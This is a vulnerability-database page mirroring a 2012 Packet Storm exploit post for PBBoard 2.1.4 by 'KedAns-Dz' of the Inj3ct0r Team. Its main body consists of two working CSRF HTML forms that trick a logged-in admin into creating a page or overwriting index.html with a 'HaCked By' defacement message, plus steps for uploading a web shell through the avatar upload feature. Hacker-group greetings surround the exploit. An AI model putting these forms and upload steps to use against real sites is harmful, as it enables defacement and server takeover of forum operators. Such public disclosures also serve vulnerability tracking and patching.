Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:109706
HistoryFeb 12, 2012 - 12:00 a.m.

PBBoard 2.1.4 Cross Site Request Forgery / Shell Upload

2012-02-1200:00:00
KedAns-Dz
packetstormsecurity.com
19
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : PBBoard v2.1.4 <= Multiple Vulnerabilites  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.dis9.com * exploit-id.com  
# Facebook : http://facebook.com/KedAns  
# platform : php  
# Type : Multiple XSRF/FU  
# Tested on : Windows XP-SP3 Fr  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |  
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |  
# | ------------------------------------------------- < |  
##  
  
# [1] XSRF/CSRF Add NeW File =>  
  
<form action="http://[target]/admin.php?page=pages&add=1&start=1" name="myform" method="post">  
<input type="text" name="name" id="input_name" value="dz.html" size="30" />&nbsp;  
<textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/">  
HaCked By KedAns-Dz  
</textarea>  
<input class="submit" type="submit" value="Submit/Save" name="submit" accesskey="s" />  
</form>  
  
# [2] XSRF/CSRF Change Index File =>  
  
<form action="http://[target]/admin.php?page=pages&dit=1&start=1&id=1" name="myform" method="post">  
<input type="text" name="name" id="input_name" value="index.html" size="30" />&nbsp;  
<textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/">  
HaCked By KedAns-Dz  
</textarea>  
<input class="submit" type="submit" value="Submit/Accept" name="submit" accesskey="s" />  
</form>  
  
# [3] Shell/File Upload :   
  
aFter register go to :  
  
/index.php?page=usercp&control=1&avatar=1&main=1  
  
# Upload SHell {Ev!L}.txt  
  
+ fin him /download/avatar/{Ev!L}.txt  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *   
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X  
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX  
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..  
#================================================================================================  
`
JSON